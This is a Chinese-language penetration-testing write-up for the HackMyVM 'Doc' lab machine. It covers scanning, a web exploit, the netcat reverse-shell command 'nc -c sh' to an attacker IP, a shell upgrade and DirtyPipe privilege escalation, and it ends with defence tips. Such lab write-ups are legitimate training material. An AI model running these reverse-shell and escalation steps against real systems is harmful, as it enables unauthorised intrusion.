hackmyvm系列12——doc
字数 941 2025-08-12 11:34:21
HackMyVM系列12——Doc靶场渗透测试报告
1. 靶场概述
本靶场名称为"Doc",属于HackMyVM系列的第12个靶机。这是一个基于Web应用的漏洞利用和权限提升练习环境,主要涉及信息收集、Web漏洞利用和Linux系统提权等技术点。
2. 信息收集阶段
2.1 初始扫描
使用Nmap进行全端口扫描:
nmap -sV -Pn -sC -A 192.168.56.185 -p 0-65535
关键参数说明:
-sV:服务版本检测-Pn:跳过主机发现,直接扫描-sC:使用默认脚本扫描-A:全面扫描(OS检测、版本检测、脚本扫描和traceroute)
2.2 Web应用发现
访问主页后发现登录页面,从中发现一个域名:
doc.hmv
将域名添加到hosts文件:
vim /etc/hosts
添加内容:
192.168.56.185 doc.hmv
3. 漏洞利用阶段
3.1 历史漏洞搜索
通过搜索引擎查找该Web应用的历史漏洞,发现可利用的漏洞。
3.2 反弹Shell获取
使用发现的exp进行反弹shell操作:
nc -c sh 192.168.56.105 6666
获取稳定shell:
python3 -c "import pty;pty.spawn('/bin/bash');"
4. 权限提升阶段
4.1 上传检测脚本
上传提权检测脚本,识别可能的提权路径。
4.2 DirtyPipe漏洞利用
尝试使用CVE-2022-0847 (DirtyPipe)漏洞进行提权:
- 上传exp到目标系统
- 编译时遇到错误,原因是环境变量问题
- 修复环境变量:
export PATH=$PATH:/usr/bin/ld
- 重新编译并运行exp
5. 关键知识点总结
-
信息收集:
- 全端口扫描对于发现隐藏服务至关重要
- 域名发现和hosts文件修改是Web测试常见操作
-
漏洞利用:
- 历史漏洞搜索是快速突破的有效方法
- 反弹shell后获取稳定shell的技术(Python pty)
-
权限提升:
- 环境变量问题可能导致编译失败,需要灵活处理
- DirtyPipe(CVE-2022-0847)是Linux内核提权漏洞
- 上传和编译exp是常见提权手段
6. 防御建议
- 及时更新系统和应用补丁
- 限制不必要的网络服务暴露
- 监控系统异常进程和网络连接
- 实施最小权限原则
- 定期进行安全审计和漏洞扫描
7. 注意事项
- 本技术仅用于合法授权测试
- 实际渗透测试需获得书面授权
- 所有操作应在可控实验环境中进行
- 遵守当地法律法规
8. 扩展学习
- 深入研究DirtyPipe漏洞原理
- 学习其他Linux提权技术
- 掌握更多Web应用漏洞利用方法
- 练习自动化渗透测试工具使用